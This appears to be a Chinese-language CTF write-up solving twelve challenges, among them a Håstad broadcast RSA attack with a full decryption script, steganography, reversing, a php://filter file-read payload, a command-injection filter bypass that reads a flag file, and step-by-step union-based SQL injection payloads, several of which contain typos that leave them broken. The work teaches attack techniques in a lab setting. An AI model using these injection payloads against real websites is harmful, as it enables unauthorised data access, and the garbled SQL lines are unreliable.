1.师姐的生日
这里要用bp爆破,先抓包,发送给Intruder库进行爆破,然后再发送到重发器找到flag。进行四位数字的爆破,payload中,类型选择number,从0000到1231。
2.EZ-RSA
from Crypto.Util.number import *
import gmpy2
flag = 'flag{*********************************}'
m=bytes_to_long(flag.encode())
def getN():
p=getPrime(256)
q=getPrime(256)
n=p*q
return n
e=0x3
n1=getN()
c1=pow(m,e,n1)
n2=getN()
c2=pow(m,e,n2)
n3=getN()
c3=pow(m,e,n3)
print("n=",[n1,n2,n3])
print("c=",[c1,c2,c3])
'''
n= [5567000486226353254524673454357147076118077122275789480555238584552332526459181641567858429587222587683345901310468140782420858931709570476562698953112801, 6982887363645354856540867035629441781549999700006363403940951376485517460506822033812812263179663875843737953430050436453298336104404304183964162702612863, 5569628780521526092136759047774448808289588145127191213956593902336353172559905282602383716258500935021056393917971164303539941268395159953652768614304911]
c= [4112523544883480830903403452517516825703078902670926405984774762024235980767805538947466914193950835488469608756778569692190967901730207690525300247682815, 4181292472036270897593568708931413787888488621274030741130549434467976405476555130890722346319549396800183827305452019796119873044279138566837264814627098, 3857434270788621361517349247277347831953021241414984430770586220424214110700999615785879462771584952744049357875753754209006439028080870626012342467148773]
解密脚本
import binascii,gmpy2 #导入库,binascii将数字转换成二进制字符串,gmpy2用于大数运算
n= [5567000486226353254524673454357147076118077122275789480555238584552332526459181641567858429587222587683345901310468140782420858931709570476562698953112801, 6982887363645354856540867035629441781549999700006363403940951376485517460506822033812812263179663875843737953430050436453298336104404304183964162702612863, 5569628780521526092136759047774448808289588145127191213956593902336353172559905282602383716258500935021056393917971164303539941268395159953652768614304911]
c= [4112523544883480830903403452517516825703078902670926405984774762024235980767805538947466914193950835488469608756778569692190967901730207690525300247682815, 4181292472036270897593568708931413787888488621274030741130549434467976405476555130890722346319549396800183827305452019796119873044279138566837264814627098, 3857434270788621361517349247277347831953021241414984430770586220424214110700999615785879462771584952744049357875753754209006439028080870626012342467148773]
from functools import reduce #用于对序列进行累积操作
def CRT(mi, ai): #中国剩余定理,用于合并c中的加密结果,mi模数列表,ai加密列表
assert(reduce(gmpy2.gcd,mi)==1) #模数是互质(它们的最大公约数)
assert (isinstance(mi, list) and isinstance(ai, list))
M = reduce(lambda x, y: x * y, mi)#计算所有模数的乘积M
ai_ti_Mi = [a * (M // m) * gmpy2.invert(M // m, m) for (m, a) in zip(mi, ai)]#m对应的加密结果a储存在ai_ti_mi列表中,x模m的乘法逆元
return reduce(lambda x, y: x + y, ai_ti_Mi) % M#将所有a相加,并对m取模得到crt结果
e=0x3#公钥指数
m=gmpy2.iroot(CRT(n, c), e)[0]#第一个元素是整数部分,用[0]获取
print(binascii.unhexlify(hex(m)[2:].strip("L")))#将明文从十六进制转化为十进制,即可得到flag
3.不要尝试爆破哦
用stegsolve扫描,找到key来打开加密的zip文件,得到很多base64编码,转化为图片,得到缺少定位角的二维码,用PS或PPT还原后扫描即可得到flag
4.re1
用IDA打开,然后寻找main函数,按R,F5进行反编译,得到的程序进行解读,3代替e,0代替O,字符替换,得到flag
5.留个后门
用代码审计工具D盾扫描后,查看文件post找到flag
6.Fuck
用base16,再用base32,最后用brain fuck解密,即可得到flag
7.师姐旅游的照片
用010 edtor扫描图片,末尾得到一串base64的密码,解密得到一半flag,然后在kali中分离出另一张图片,提示中的1607转化为16进制,然后图片的实际高为800转化为16进制,搜索后改掉即可看到另一半flag
8.来听一首音乐
先下载MP3mgeto,看到还有一张图片,相机型号为pass,将yunxi.mp3与MP3mgeto放在同一目录下,打开终端,输入Encode -X -P pass(密码)yunxi.mp3,该目录下找到被base64编码的flag解密即可
9.Gentle—sister
查看源码发现为get传参,在url后面加?My_paramater[]=1,即可得的flag
10.一个朴实无华的界面
打开环境是个静态页面,需要信息搜集爬虫协议robots.txt,返问0e1G7.php,然后根据得到的内容构造payload,G7=php://filter/convert.iconv.utf-8.utf-7/resource=flag.php(有好几种写法),再用base64解密即可
11.Rceeee
一个典型的过滤,根据提示输入?cmd=c\at/fl\ag | tee 1.txt ,然后打开1.txt即可。
12.斗宗强者恐怖如斯
这是SQL注入的题目,先用若密码爆破,得到用户名为admin,密码为admin123
判断注入类型 ?id=-1 ’)
暴库?id=-1') union select 1,2 database()--+
爆表 ?id=-1’)union select 1,2 group concat(table_name)from infooimation_schema.table where table_schema='x it if_sql' --+
爆列 ?id=-1' union select 1,2 group concat(column_name)from infooimation_schema.columns where table_name='flag' --+
爆值 ?id=-1') union select 1,2,group_concat(flAg) from xiti_sql.flag --+